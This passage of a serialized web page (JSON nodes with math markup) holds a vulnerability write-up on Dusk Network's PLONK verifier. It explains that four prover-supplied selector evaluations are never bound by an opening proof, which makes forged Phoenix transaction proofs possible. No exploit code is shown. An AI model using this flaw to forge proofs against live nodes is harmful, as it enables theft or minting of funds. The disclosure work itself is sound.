",{"type":25,"tag":162,"props":149033,"children":149036},{"href":149034,"rel":149035},"https://github.com/Consensys/gnark/blob/17b079f1b813d9dafd465202466b09f282b4c5e9/backend/plonk/bls12-381/verify.go#L253-L270",[166],[149037],{"type":31,"value":149038},"linearization multi-scalar multiplication",{"type":31,"value":149040},", ensuring their values are cryptographically bound by construction.",{"type":25,"tag":38,"props":149042,"children":149043},{},[149044,149046,149071],{"type":31,"value":149045},"Dusk's custom widgets were more complex (multiplying selectors with other evaluated terms), so they could not just use a simple linear combination of commitments. Their architecture required evaluating the selectors at ",{"type":25,"tag":82,"props":149047,"children":149049},{"className":149048},[212,4702],[149050],{"type":25,"tag":216,"props":149051,"children":149053},{"className":149052},[224],[149054],{"type":25,"tag":216,"props":149055,"children":149057},{"className":149056,"ariaHidden":230},[229],[149058],{"type":25,"tag":216,"props":149059,"children":149061},{"className":149060},[235],[149062,149066],{"type":25,"tag":216,"props":149063,"children":149065},{"className":149064,"style":6315},[240],[],{"type":25,"tag":216,"props":149067,"children":149069},{"className":149068,"style":117544},[246,2151],[149070],{"type":31,"value":117547},{"type":31,"value":149072}," and using those scalars. But while they serialized those four selector evaluations into the proof struct, they never actually verified them against the verifier key's commitments through an opening proof.",{"type":25,"tag":38,"props":149074,"children":149075},{},[149076],{"type":31,"value":149077},"The shortest way to see the bug is the graph below: safe values flow through the opening path toward the final pairing check, while the red selector flow enters verifier logic without ever touching an opening proof.",{"type":25,"tag":149079,"props":149080,"children":149081},"dusk-verifier-dependence-graph",{},[],{"type":25,"tag":22753,"props":149083,"children":149084},{},[],{"type":25,"tag":26,"props":149086,"children":149088},{"id":149087},"how-dusk-uses-plonk",[149089],{"type":31,"value":149090},"How Dusk uses PLONK",{"type":25,"tag":38,"props":149092,"children":149093},{},[149094,149100],{"type":25,"tag":162,"props":149095,"children":149097},{"href":145842,"rel":149096},[166],[149098],{"type":31,"value":149099},"Dusk Network",{"type":31,"value":149101}," is a privacy-focused L1 blockchain. Its transaction model has two modes:",{"type":25,"tag":2039,"props":149103,"children":149104},{},[149105,149110],{"type":25,"tag":2043,"props":149106,"children":149107},{},[149108],{"type":31,"value":149109},"Phoenix (shielded): amounts and participants are hidden using ZK proofs, and every Phoenix transaction carries a PLONK proof that the transaction is valid.",{"type":25,"tag":2043,"props":149111,"children":149112},{},[149113],{"type":31,"value":149114},"Moonlight (transparent): standard account-based transactions verified by BLS signatures, with no PLONK involvement.",{"type":25,"tag":38,"props":149116,"children":149117},{},[149118,149120,149131,149133,149144],{"type":31,"value":149119},"At node level, every ",{"type":25,"tag":162,"props":149121,"children":149124},{"href":149122,"rel":149123},"https://github.com/dusk-network/rusk/blob/264c1ec0f4c005ef043b87deb1c866035e034330/rusk/src/lib/node/vm.rs#L152-L185",[166],[149125],{"type":25,"tag":82,"props":149126,"children":149128},{"className":149127},[],[149129],{"type":31,"value":149130},"ProtocolTransaction::Phoenix",{"type":31,"value":149132}," goes through ",{"type":25,"tag":162,"props":149134,"children":149137},{"href":149135,"rel":149136},"https://github.com/dusk-network/rusk/blob/264c1ec0f4c005ef043b87deb1c866035e034330/rusk/src/lib/verifier.rs#L71-L82",[166],[149138],{"type":25,"tag":82,"props":149139,"children":149141},{"className":149140},[],[149142],{"type":31,"value":149143},"verify_proof_with_version()",{"type":31,"value":149145}," during preverification. If that PLONK proof verifies, the transaction is admitted to the mempool and can later be mined into a block. Moonlight-path transactions instead go through BLS signature verification.",{"type":25,"tag":38,"props":149147,"children":149148},{},[149149,149151,149162,149164,149175,149176,149187,149188,149199,149200,149211],{"type":31,"value":149150},"That same Phoenix proof path covers more than simple shielded transfers. Phoenix-path staking, reward withdrawals, unstaking, and Phoenix-to-Moonlight conversion all build a Phoenix transaction via ",{"type":25,"tag":162,"props":149152,"children":149155},{"href":149153,"rel":149154},"https://github.com/dusk-network/rusk/blob/264c1ec0f4c005ef043b87deb1c866035e034330/wallet-core/src/transaction.rs#L54-L95",[166],[149156],{"type":25,"tag":82,"props":149157,"children":149159},{"className":149158},[],[149160],{"type":31,"value":149161},"phoenix()",{"type":31,"value":149163},", for example in ",{"type":25,"tag":162,"props":149165,"children":149168},{"href":149166,"rel":149167},"https://github.com/dusk-network/rusk/blob/264c1ec0f4c005ef043b87deb1c866035e034330/wallet-core/src/transaction.rs#L144-L186",[166],[149169],{"type":25,"tag":82,"props":149170,"children":149172},{"className":149171},[],[149173],{"type":31,"value":149174},"phoenix_stake()",{"type":31,"value":7026},{"type":25,"tag":162,"props":149177,"children":149180},{"href":149178,"rel":149179},"https://github.com/dusk-network/rusk/blob/264c1ec0f4c005ef043b87deb1c866035e034330/wallet-core/src/transaction.rs#L240-L298",[166],[149181],{"type":25,"tag":82,"props":149182,"children":149184},{"className":149183},[],[149185],{"type":31,"value":149186},"phoenix_stake_reward()",{"type":31,"value":7026},{"type":25,"tag":162,"props":149189,"children":149192},{"href":149190,"rel":149191},"https://github.com/dusk-network/rusk/blob/264c1ec0f4c005ef043b87deb1c866035e034330/wallet-core/src/transaction.rs#L358-L416",[166],[149193],{"type":25,"tag":82,"props":149194,"children":149196},{"className":149195},[],[149197],{"type":31,"value":149198},"phoenix_unstake()",{"type":31,"value":10439},{"type":25,"tag":162,"props":149201,"children":149204},{"href":149202,"rel":149203},"https://github.com/dusk-network/rusk/blob/264c1ec0f4c005ef043b87deb1c866035e034330/wallet-core/src/transaction.rs#L481-L539",[166],[149205],{"type":25,"tag":82,"props":149206,"children":149208},{"className":149207},[],[149209],{"type":31,"value":149210},"phoenix_to_moonlight()",{"type":31,"value":149212},". So if Phoenix proof verification is unsound, the entire shielded transaction path is exposed.",{"type":25,"tag":38,"props":149214,"children":149215},{},[149216],{"type":25,"tag":6467,"props":149217,"children":149220},{"alt":149218,"src":149219},"phoenix_moonlight","/posts/dusk-commitment-issues/phoenix_moonlight.svg",[],{"type":25,"tag":38,"props":149222,"children":149223},{},[149224,149226,149232,149234,149241],{"type":31,"value":149225},"The PLONK implementation, ",{"type":25,"tag":162,"props":149227,"children":149230},{"href":149228,"rel":149229},"https://github.com/dusk-network/plonk",[166],[149231],{"type":31,"value":145837},{"type":31,"value":149233},", is a standalone library by the Dusk team. It was among the first PLONK implementations written, with development starting the same year ",{"type":25,"tag":162,"props":149235,"children":149238},{"href":149236,"rel":149237},"https://eprint.iacr.org/archive/2019/953/1566424053.pdf",[166],[149239],{"type":31,"value":149240},"the original paper",{"type":31,"value":149242}," was released.",{"type":25,"tag":38,"props":149244,"children":149245},{},[149246,149248,149254],{"type":31,"value":149247},"The Phoenix transaction PLONK circuit is defined ",{"type":25,"tag":162,"props":149249,"children":149252},{"href":149250,"rel":149251},"https://github.com/dusk-network/phoenix/blob/1bb89b289b3d32115c49fdf80f7f4164578a283a/circuits/src/circuit_impl.rs#L20-L205",[166],[149253],{"type":31,"value":51553},{"type":31,"value":149255},". The circuit enforces the following set of constraints:",{"type":25,"tag":59713,"props":149257,"children":149258},{},[149259,149275],{"type":25,"tag":126930,"props":149260,"children":149261},{},[149262],{"type":25,"tag":126934,"props":149263,"children":149264},{},[149265,149270],{"type":25,"tag":126938,"props":149266,"children":149267},{},[149268],{"type":31,"value":149269},"Circuit check",{"type":25,"tag":126938,"props":149271,"children":149272},{},[149273],{"type":31,"value":149274},"Statement being checked",{"type":25,"tag":126958,"props":149276,"children":149277},{},[149278,149296,149314,149332,149350,149507,149647,149665],{"type":25,"tag":126934,"props":149279,"children":149280},{},[149281,149291],{"type":25,"tag":126965,"props":149282,"children":149283},{},[149284],{"type":25,"tag":162,"props":149285,"children":149288},{"href":149286,"rel":149287},"https://github.com/dusk-network/phoenix/blob/1bb89b289b3d32115c49fdf80f7f4164578a283a/circuits/src/circuit_impl.rs#L106-L126",[166],[149289],{"type":31,"value":149290},"Merkle tree membership",{"type":25,"tag":126965,"props":149292,"children":149293},{},[149294],{"type":31,"value":149295},"Each input note hash is opened against the public Merkle root, so only notes already in the note tree may be spent",{"type":25,"tag":126934,"props":149297,"children":149298},{},[149299,149309],{"type":25,"tag":126965,"props":149300,"children":149301},{},[149302],{"type":25,"tag":162,"props":149303,"children":149306},{"href":149304,"rel":149305},"https://github.com/dusk-network/phoenix/blob/1bb89b289b3d32115c49fdf80f7f4164578a283a/circuits/src/circuit_impl.rs#L70-L79",[166],[149307],{"type":31,"value":149308},"Input-note secret-key authorization",{"type":25,"tag":126965,"props":149310,"children":149311},{},[149312],{"type":31,"value":149313},"The prover knows the secret key controlling each input note",{"type":25,"tag":126934,"props":149315,"children":149316},{},[149317,149327],{"type":25,"tag":126965,"props":149318,"children":149319},{},[149320],{"type":25,"tag":162,"props":149321,"children":149324},{"href":149322,"rel":149323},"https://github.com/dusk-network/phoenix/blob/1bb89b289b3d32115c49fdf80f7f4164578a283a/circuits/src/circuit_impl.rs#L81-L87",[166],[149325],{"type":31,"value":149326},"Nullifier correctness",{"type":25,"tag":126965,"props":149328,"children":149329},{},[149330],{"type":31,"value":149331},"Each nullifier matches the corresponding note key and position",{"type":25,"tag":126934,"props":149333,"children":149334},{},[149335,149345],{"type":25,"tag":126965,"props":149336,"children":149337},{},[149338],{"type":25,"tag":162,"props":149339,"children":149342},{"href":149340,"rel":149341},"https://github.com/dusk-network/phoenix/blob/1bb89b289b3d32115c49fdf80f7f4164578a283a/circuits/src/circuit_impl.rs#L149-L160",[166],[149343],{"type":31,"value":149344},"Output value commitment correctness",{"type":25,"tag":126965,"props":149346,"children":149347},{},[149348],{"type":31,"value":149349},"Each public output commitment matches the secret output value and blinder",{"type":25,"tag":126934,"props":149351,"children":149352},{},[149353,149363],{"type":25,"tag":126965,"props":149354,"children":149355},{},[149356],{"type":25,"tag":162,"props":149357,"children":149360},{"href":149358,"rel":149359},"https://github.com/dusk-network/phoenix/blob/1bb89b289b3d32115c49fdf80f7f4164578a283a/circuits/src/circuit_impl.rs#L167-L178",[166],[149361],{"type":31,"value":149362},"Balance integrity",{"type":25,"tag":126965,"props":149364,"children":149365},{},[149366],{"type":25,"tag":82,"props":149367,"children":149369},{"className":149368},[212,4702],[149370],{"type":25,"tag":216,"props":149371,"children":149373},{"className":149372},[224],[149374],{"type":25,"tag":216,"props":149375,"children":149377},{"className":149376,"ariaHidden":230},[229],[149378,149418,149458,149490],{"type":25,"tag":216,"props":149379,"children":149381},{"className":149380},[235],[149382,149386,149391,149395,149405,149409,149414],{"type":25,"tag":216,"props":149383,"children":149385},{"className":149384,"style":5513},[240],[],{"type":25,"tag":216,"props":149387,"children":149389},{"className":149388,"style":25584},[1841,4048,25583],[149390],{"type":31,"value":4052},{"type":25,"tag":216,"props":149392,"children":149394},{"className":149393,"style":1871},[257],[],{"type":25,"tag":216,"props":149396,"children":149398},{"className":149397},[246,31],[149399],{"type":25,"tag":216,"props":149400,"children":149402},{"className":149401},[246],[149403],{"type":31,"value":149404},"inputs",{"type":25,"tag":216,"props":149406,"children":149408},{"className":149407,"style":258},[257],[],{"type":25,"tag":216,"props":149410,"children":149412},{"className":149411},[263],[149413],{"type":31,"value":266},{"type":25,"tag":216,"props":149415,"children":149417},{"className":149416,"style":258},[257],[],{"type":25,"tag":216,"props":149419,"children":149421},{"className":149420},[235],[149422,149426,149431,149435,149445,149449,149454],{"type":25,"tag":216,"props":149423,"children":149425},{"className":149424,"style":5513},[240],[],{"type":25,"tag":216,"props":149427,"children":149429},{"className":149428,"style":25584},[1841,4048,25583],[149430],{"type":31,"value":4052},{"type":25,"tag":216,"props":149432,"children":149434},{"className":149433,"style":1871},[257],[],{"type":25,"tag":216,"props":149436,"children":149438},{"className":149437},[246,31],[149439],{"type":25,"tag":216,"props":149440,"children":149442},{"className":149441},[246],[149443],{"type":31,"value":149444},"outputs",{"type":25,"tag":216,"props":149446,"children":149448},{"className":149447,"style":335},[257],[],{"type":25,"tag":216,"props":149450,"children":149452},{"className":149451},[340],[149453],{"type":31,"value":3539},{"type":25,"tag":216,"props":149455,"children":149457},{"className":149456,"style":335},[257],[],{"type":25,"tag":216,"props":149459,"children":149461},{"className":149460},[235],[149462,149467,149477,149481,149486],{"type":25,"tag":216,"props":149463,"children":149466},{"className":149464,"style":149465},[240],"height:0.7778em;vertical-align:-0.0833em;",[],{"type":25,"tag":216,"props":149468,"children":149470},{"className":149469},[246,31],[149471],{"type":25,"tag":216,"props":149472,"children":149474},{"className":149473},[246],[149475],{"type":31,"value":149476},"fee",{"type":25,"tag":216,"props":149478,"children":149480},{"className":149479,"style":335},[257],[],{"type":25,"tag":216,"props":149482,"children":149484},{"className":149483},[340],[149485],{"type":31,"value":3539},{"type":25,"tag":216,"props":149487,"children":149489},{"className":149488,"style":335},[257],[],{"type":25,"tag":216,"props":149491,"children":149493},{"className":149492},[235],[149494,149498],{"type":25,"tag":216,"props":149495,"children":149497},{"className":149496,"style":1519},[240],[],{"type":25,"tag":216,"props":149499,"children":149501},{"className":149500},[246,31],[149502],{"type":25,"tag":216,"props":149503,"children":149505},{"className":149504},[246],[149506],{"type":31,"value":65931},{"type":25,"tag":126934,"props":149508,"children":149509},{},[149510,149527],{"type":25,"tag":126965,"props":149511,"children":149512},{},[149513,149520,149521],{"type":25,"tag":162,"props":149514,"children":149517},{"href":149515,"rel":149516},"https://github.com/dusk-network/phoenix/blob/1bb89b289b3d32115c49fdf80f7f4164578a283a/circuits/src/circuit_impl.rs#L89-L90",[166],[149518],{"type":31,"value":149519},"Range checks on inputs",{"type":31,"value":1307},{"type":25,"tag":162,"props":149522,"children":149525},{"href":149523,"rel":149524},"https://github.com/dusk-network/phoenix/blob/1bb89b289b3d32115c49fdf80f7f4164578a283a/circuits/src/circuit_impl.rs#L141-L142",[166],[149526],{"type":31,"value":149444},{"type":25,"tag":126965,"props":149528,"children":149529},{},[149530,149532],{"type":31,"value":149531},"All note values lie in ",{"type":25,"tag":82,"props":149533,"children":149535},{"className":149534},[212,4702],[149536],{"type":25,"tag":216,"props":149537,"children":149539},{"className":149538},[224],[149540],{"type":25,"tag":216,"props":149541,"children":149543},{"className":149542,"ariaHidden":230},[229],[149544,149629],{"type":25,"tag":216,"props":149545,"children":149547},{"className":149546},[235],[149548,149552,149557,149562,149567,149571,149616,149620,149625],{"type":25,"tag":216,"props":149549,"children":149551},{"className":149550,"style":119295},[240],[],{"type":25,"tag":216,"props":149553,"children":149555},{"className":149554},[287],[149556],{"type":31,"value":7701},{"type":25,"tag":216,"props":149558,"children":149560},{"className":149559},[246],[149561],{"type":31,"value":1882},{"type":25,"tag":216,"props":149563,"children":149565},{"className":149564},[1864],[149566],{"type":31,"value":1867},{"type":25,"tag":216,"props":149568,"children":149570},{"className":149569,"style":1871},[257],[],{"type":25,"tag":216,"props":149572,"children":149574},{"className":149573},[246],[149575,149580],{"type":25,"tag":216,"props":149576,"children":149578},{"className":149577},[246],[149579],{"type":31,"value":331},{"type":25,"tag":216,"props":149581,"children":149583},{"className":149582},[2159],[149584],{"type":25,"tag":216,"props":149585,"children":149587},{"className":149586},[298],[149588],{"type":25,"tag":216,"props":149589,"children":149591},{"className":149590},[304],[149592],{"type":25,"tag":216,"props":149593,"children":149595},{"className":149594,"style":7974},[309],[149596],{"type":25,"tag":216,"props":149597,"children":149598},{"style":6104},[149599,149603],{"type":25,"tag":216,"props":149600,"children":149602},{"className":149601,"style":2181},[319],[],{"type":25,"tag":216,"props":149604,"children":149606},{"className":149605},[2186,2187,2188,2189],[149607],{"type":25,"tag":216,"props":149608,"children":149610},{"className":149609},[246,2189],[149611],{"type":25,"tag":216,"props":149612,"children":149614},{"className":149613},[246,2189],[149615],{"type":31,"value":33383},{"type":25,"tag":216,"props":149617,"children":149619},{"className":149618,"style":335},[257],[],{"type":25,"tag":216,"props":149621,"children":149623},{"className":149622},[340],[149624],{"type":31,"value":3378},{"type":25,"tag":216,"props":149626,"children":149628},{"className":149627,"style":335},[257],[],{"type":25,"tag":216,"props":149630,"children":149632},{"className":149631},[235],[149633,149637,149642],{"type":25,"tag":216,"props":149634,"children":149636},{"className":149635,"style":5513},[240],[],{"type":25,"tag":216,"props":149638,"children":149640},{"className":149639},[246],[149641],{"type":31,"value":184},{"type":25,"tag":216,"props":149643,"children":149645},{"className":149644},[427],[149646],{"type":31,"value":19368},{"type":25,"tag":126934,"props":149648,"children":149649},{},[149650,149660],{"type":25,"tag":126965,"props":149651,"children":149652},{},[149653],{"type":25,"tag":162,"props":149654,"children":149657},{"href":149655,"rel":149656},"https://github.com/dusk-network/phoenix/blob/1bb89b289b3d32115c49fdf80f7f4164578a283a/circuits/src/sender_enc.rs#L28-L51",[166],[149658],{"type":31,"value":149659},"Sender-authorship signatures",{"type":25,"tag":126965,"props":149661,"children":149662},{},[149663],{"type":31,"value":149664},"The transaction payload is signed by the sender's two signing key components",{"type":25,"tag":126934,"props":149666,"children":149667},{},[149668,149678],{"type":25,"tag":126965,"props":149669,"children":149670},{},[149671],{"type":25,"tag":162,"props":149672,"children":149675},{"href":149673,"rel":149674},"https://github.com/dusk-network/phoenix/blob/1bb89b289b3d32115c49fdf80f7f4164578a283a/circuits/src/sender_enc.rs#L63-L121",[166],[149676],{"type":31,"value":149677},"Sender encryption correctness",{"type":25,"tag":126965,"props":149679,"children":149680},{},[149681],{"type":31,"value":149682},"The sender data attached to each output note is a correct ElGamal encryption under the recipient note key",{"type":25,"tag":38,"props":149684,"children":149685},{},[149686,149688,149694,149696,149705],{"type":31,"value":149687},"Rusk does not consume these claims one by one. It consumes a single valid/invalid proof verdict over ",{"type":25,"tag":82,"props":149689,"children":149691},{"className":149690},[],[149692],{"type":31,"value":149693},"tx.public_inputs()",{"type":31,"value":149695}," via ",{"type":25,"tag":162,"props":149697,"children":149699},{"href":149135,"rel":149698},[166],[149700],{"type":25,"tag":82,"props":149701,"children":149703},{"className":149702},[],[149704],{"type":31,"value":149143},{"type":31,"value":179},{"type":25,"tag":38,"props":149707,"children":149708},{},[149709],{"type":31,"value":149710},"A soundness break in PLONK voids all of these constraints simultaneously, because forged selector evaluations make the entire circuit unconstrained rather than targeting any single check.",{"type":25,"tag":22753,"props":149712,"children":149713},{},[],{"type":25,"tag":26,"props":149715,"children":149716},{"id":94272},[149717],{"type":31,"value":149718},"The bug",{"type":25,"tag":38,"props":149720,"children":149721},{},[149722,149724,149731,149733,149744],{"type":31,"value":149723},"In the ",{"type":25,"tag":162,"props":149725,"children":149728},{"href":149726,"rel":149727},"https://github.com/dusk-network/plonk/blob/82c08e8f11f2db774e4e8d28e6ba7ef833cbff25/src/proof_system/proof.rs#L362-L400",[166],[149729],{"type":31,"value":149730},"PLONK verification",{"type":31,"value":149732},", the verifier batches polynomial evaluations into a single KZG opening proof check. The evaluations included in this batch (committed via ",{"type":25,"tag":162,"props":149734,"children":149737},{"href":149735,"rel":149736},"https://github.com/dusk-network/plonk/blob/82c08e8f11f2db774e4e8d28e6ba7ef833cbff25/src/proof_system/proof.rs#L362-L373",[166],[149738],{"type":25,"tag":82,"props":149739,"children":149741},{"className":149740},[],[149742],{"type":31,"value":149743},"E_evals",{"type":31,"value":149745},") are:",{"type":25,"tag":2039,"props":149747,"children":149748},{},[149749,149781,149806,149831],{"type":25,"tag":2043,"props":149750,"children":149751},{},[149752,149758,149759,149765,149766,149772,149773,149779],{"type":25,"tag":82,"props":149753,"children":149755},{"className":149754},[],[149756],{"type":31,"value":149757},"a_eval",{"type":31,"value":7026},{"type":25,"tag":82,"props":149760,"children":149762},{"className":149761},[],[149763],{"type":31,"value":149764},"b_eval",{"type":31,"value":7026},{"type":25,"tag":82,"props":149767,"children":149769},{"className":149768},[],[149770],{"type":31,"value":149771},"c_eval",{"type":31,"value":7026},{"type":25,"tag":82,"props":149774,"children":149776},{"className":149775},[],[149777],{"type":31,"value":149778},"d_eval",{"type":31,"value":149780}," (witness)",{"type":25,"tag":2043,"props":149782,"children":149783},{},[149784,149790,149791,149797,149798,149804],{"type":25,"tag":82,"props":149785,"children":149787},{"className":149786},[],[149788],{"type":31,"value":149789},"s_sigma_1_eval",{"type":31,"value":7026},{"type":25,"tag":82,"props":149792,"children":149794},{"className":149793},[],[149795],{"type":31,"value":149796},"s_sigma_2_eval",{"type":31,"value":7026},{"type":25,"tag":82,"props":149799,"children":149801},{"className":149800},[],[149802],{"type":31,"value":149803},"s_sigma_3_eval",{"type":31,"value":149805}," (permutation)",{"type":25,"tag":2043,"props":149807,"children":149808},{},[149809,149815,149816,149822,149823,149829],{"type":25,"tag":82,"props":149810,"children":149812},{"className":149811},[],[149813],{"type":31,"value":149814},"a_w_eval",{"type":31,"value":7026},{"type":25,"tag":82,"props":149817,"children":149819},{"className":149818},[],[149820],{"type":31,"value":149821},"b_w_eval",{"type":31,"value":7026},{"type":25,"tag":82,"props":149824,"children":149826},{"className":149825},[],[149827],{"type":31,"value":149828},"d_w_eval",{"type":31,"value":149830}," (shifted witness)",{"type":25,"tag":2043,"props":149832,"children":149833},{},[149834,149840],{"type":25,"tag":82,"props":149835,"children":149837},{"className":149836},[],[149838],{"type":31,"value":149839},"z_eval",{"type":31,"value":149841}," (permutation accumulator)",{"type":25,"tag":38,"props":149843,"children":149844},{},[149845,149847,149851],{"type":31,"value":149846},"But the following selector evaluations were ",{"type":25,"tag":64,"props":149848,"children":149849},{},[149850],{"type":31,"value":22448},{"type":31,"value":149852}," included:",{"type":25,"tag":2039,"props":149854,"children":149855},{},[149856,149867,149878,149889],{"type":25,"tag":2043,"props":149857,"children":149858},{},[149859,149865],{"type":25,"tag":82,"props":149860,"children":149862},{"className":149861},[],[149863],{"type":31,"value":149864},"q_arith_eval",{"type":31,"value":149866}," (arithmetic selector)",{"type":25,"tag":2043,"props":149868,"children":149869},{},[149870,149876],{"type":25,"tag":82,"props":149871,"children":149873},{"className":149872},[],[149874],{"type":31,"value":149875},"q_c_eval",{"type":31,"value":149877}," (constant selector)",{"type":25,"tag":2043,"props":149879,"children":149880},{},[149881,149887],{"type":25,"tag":82,"props":149882,"children":149884},{"className":149883},[],[149885],{"type":31,"value":149886},"q_l_eval",{"type":31,"value":149888}," (left selector)",{"type":25,"tag":2043,"props":149890,"children":149891},{},[149892,149898],{"type":25,"tag":82,"props":149893,"children":149895},{"className":149894},[],[149896],{"type":31,"value":149897},"q_r_eval",{"type":31,"value":149899}," (right selector)",{"type":25,"tag":38,"props":149901,"children":149902},{},[149903,149905,149912,149913,149920,149921,149928,149929,149936],{"type":31,"value":149904},"The prover places four selector evaluations in the proof struct. The verifier absorbs them into the transcript, and the widget verifier code uses them directly in the linearization check (",{"type":25,"tag":162,"props":149906,"children":149909},{"href":149907,"rel":149908},"https://github.com/dusk-network/plonk/blob/82c08e8f11f2db774e4e8d28e6ba7ef833cbff25/src/proof_system/linearization_poly.rs#L33-L83",[166],[149910],{"type":31,"value":149911},"proof struct",{"type":31,"value":7026},{"type":25,"tag":162,"props":149914,"children":149917},{"href":149915,"rel":149916},"https://github.com/dusk-network/plonk/blob/82c08e8f11f2db774e4e8d28e6ba7ef833cbff25/src/proof_system/proof.rs#L255-L286",[166],[149918],{"type":31,"value":149919},"transcript absorption",{"type":31,"value":7026},{"type":25,"tag":162,"props":149922,"children":149925},{"href":149923,"rel":149924},"https://github.com/dusk-network/plonk/blob/82c08e8f11f2db774e4e8d28e6ba7ef833cbff25/src/proof_system/widget/arithmetic/verifierkey.rs#L92-L118",[166],[149926],{"type":31,"value":149927},"arithmetic widget",{"type":31,"value":7026},{"type":25,"tag":162,"props":149930,"children":149933},{"href":149931,"rel":149932},"https://github.com/dusk-network/plonk/blob/82c08e8f11f2db774e4e8d28e6ba7ef833cbff25/src/proof_system/widget/ecc/scalar_mul/fixed_base/verifierkey.rs#L46-L102",[166],[149934],{"type":31,"value":149935},"fixed-base ECC widget",{"type":31,"value":149937},"). But they are never checked against the corresponding selector commitments in the verifier key, even though those commitments already exist. The prover sends whatever values it wants and the verifier trusts them.",{"type":25,"tag":38,"props":149939,"children":149940},{},[149941,149943,149947],{"type":31,"value":149942},"The easiest way to see why these four omissions are special is to contrast them with two nearby cases that are ",{"type":25,"tag":64,"props":149944,"children":149945},{},[149946],{"type":31,"value":22448},{"type":31,"value":149948}," bugs:",{"type":25,"tag":2039,"props":149950,"children":149951},{},[149952,150092],{"type":25,"tag":2043,"props":149953,"children":149954},{},[149955,149957,150002,150004,150010,150012,150017,150018,150023,150024,150029,150031,150037,150039,150084,150086,150091],{"type":31,"value":149956},"There is no prover-supplied ",{"type":25,"tag":82,"props":149958,"children":149960},{"className":149959},[212,4702],[149961],{"type":25,"tag":216,"props":149962,"children":149964},{"className":149963},[224],[149965],{"type":25,"tag":216,"props":149966,"children":149968},{"className":149967,"ariaHidden":230},[229],[149969],{"type":25,"tag":216,"props":149970,"children":149972},{"className":149971},[235],[149973,149977,149982,149987,149992,149997],{"type":25,"tag":216,"props":149974,"children":149976},{"className":149975,"style":5513},[240],[],{"type":25,"tag":216,"props":149978,"children":149980},{"className":149979},[246,2151],[149981],{"type":31,"value":2254},{"type":25,"tag":216,"props":149983,"children":149985},{"className":149984},[287],[149986],{"type":31,"value":1850},{"type":25,"tag":216,"props":149988,"children":149990},{"className":149989,"style":117544},[246,2151],[149991],{"type":31,"value":117547},{"type":25,"tag":216,"props":149993,"children":149995},{"className":149994,"style":2325},[246,2151],[149996],{"type":31,"value":148666},{"type":25,"tag":216,"props":149998,"children":150000},{"className":149999},[427],[150001],{"type":31,"value":1888},{"type":31,"value":150003}," field at all. ",{"type":25,"tag":82,"props":150005,"children":150007},{"className":150006},[],[150008],{"type":31,"value":150009},"ProofEvaluations",{"type":31,"value":150011}," contains ",{"type":25,"tag":82,"props":150013,"children":150015},{"className":150014},[],[150016],{"type":31,"value":149814},{"type":31,"value":7026},{"type":25,"tag":82,"props":150019,"children":150021},{"className":150020},[],[150022],{"type":31,"value":149821},{"type":31,"value":10439},{"type":25,"tag":82,"props":150025,"children":150027},{"className":150026},[],[150028],{"type":31,"value":149828},{"type":31,"value":150030},", but no ",{"type":25,"tag":82,"props":150032,"children":150034},{"className":150033},[],[150035],{"type":31,"value":150036},"c_w_eval",{"type":31,"value":150038},", so the verifier never consumes an unbound ",{"type":25,"tag":82,"props":150040,"children":150042},{"className":150041},[212,4702],[150043],{"type":25,"tag":216,"props":150044,"children":150046},{"className":150045},[224],[150047],{"type":25,"tag":216,"props":150048,"children":150050},{"className":150049,"ariaHidden":230},[229],[150051],{"type":25,"tag":216,"props":150052,"children":150054},{"className":150053},[235],[150055,150059,150064,150069,150074,150079],{"type":25,"tag":216,"props":150056,"children":150058},{"className":150057,"style":5513},[240],[],{"type":25,"tag":216,"props":150060,"children":150062},{"className":150061},[246,2151],[150063],{"type":31,"value":2254},{"type":25,"tag":216,"props":150065,"children":150067},{"className":150066},[287],[150068],{"type":31,"value":1850},{"type":25,"tag":216,"props":150070,"children":150072},{"className":150071,"style":117544},[246,2151],[150073],{"type":31,"value":117547},{"type":25,"tag":216,"props":150075,"children":150077},{"className":150076,"style":2325},[246,2151],[150078],{"type":31,"value":148666},{"type":25,"tag":216,"props":150080,"children":150082},{"className":150081},[427],[150083],{"type":31,"value":1888},{"type":31,"value":150085}," claim (",{"type":25,"tag":162,"props":150087,"children":150089},{"href":149907,"rel":150088},[166],[150090],{"type":31,"value":149911},{"type":31,"value":24702},{"type":25,"tag":2043,"props":150093,"children":150094},{},[150095,150097,150184,150186,150278,150279,150286],{"type":31,"value":150096},"There is a fourth permutation commitment ",{"type":25,"tag":82,"props":150098,"children":150100},{"className":150099},[212,4702],[150101],{"type":25,"tag":216,"props":150102,"children":150104},{"className":150103},[224],[150105],{"type":25,"tag":216,"props":150106,"children":150108},{"className":150107,"ariaHidden":230},[229],[150109],{"type":25,"tag":216,"props":150110,"children":150112},{"className":150111},[235],[150113,150117,150122,150179],{"type":25,"tag":216,"props":150114,"children":150116},{"className":150115,"style":5513},[240],[],{"type":25,"tag":216,"props":150118,"children":150120},{"className":150119},[287],[150121],{"type":31,"value":7701},{"type":25,"tag":216,"props":150123,"children":150125},{"className":150124},[246],[150126,150131],{"type":25,"tag":216,"props":150127,"children":150129},{"className":150128,"style":2325},[246,2151],[150130],{"type":31,"value":148561},{"type":25,"tag":216,"props":150132,"children":150134},{"className":150133},[2159],[150135],{"type":25,"tag":216,"props":150136,"children":150138},{"className":150137},[298,299],[150139,150168],{"type":25,"tag":216,"props":150140,"children":150142},{"className":150141},[304],[150143,150163],{"type":25,"tag":216,"props":150144,"children":150146},{"className":150145,"style":97069},[309],[150147],{"type":25,"tag":216,"props":150148,"children":150149},{"style":2347},[150150,150154],{"type":25,"tag":216,"props":150151,"children":150153},{"className":150152,"style":2181},[319],[],{"type":25,"tag":216,"props":150155,"children":150157},{"className":150156},[2186,2187,2188,2189],[150158],{"type":25,"tag":216,"props":150159,"children":150161},{"className":150160},[246,2189],[150162],{"type":31,"value":21486},{"type":25,"tag":216,"props":150164,"children":150166},{"className":150165},[408],[150167],{"type":31,"value":411},{"type":25,"tag":216,"props":150169,"children":150171},{"className":150170},[304],[150172],{"type":25,"tag":216,"props":150173,"children":150175},{"className":150174,"style":2209},[309],[150176],{"type":25,"tag":216,"props":150177,"children":150178},{},[],{"type":25,"tag":216,"props":150180,"children":150182},{"className":150181},[427],[150183],{"type":31,"value":19368},{"type":31,"value":150185}," in the verifier key, but the verifier uses the commitment itself inside the linearization MSM rather than trusting a prover-supplied scalar 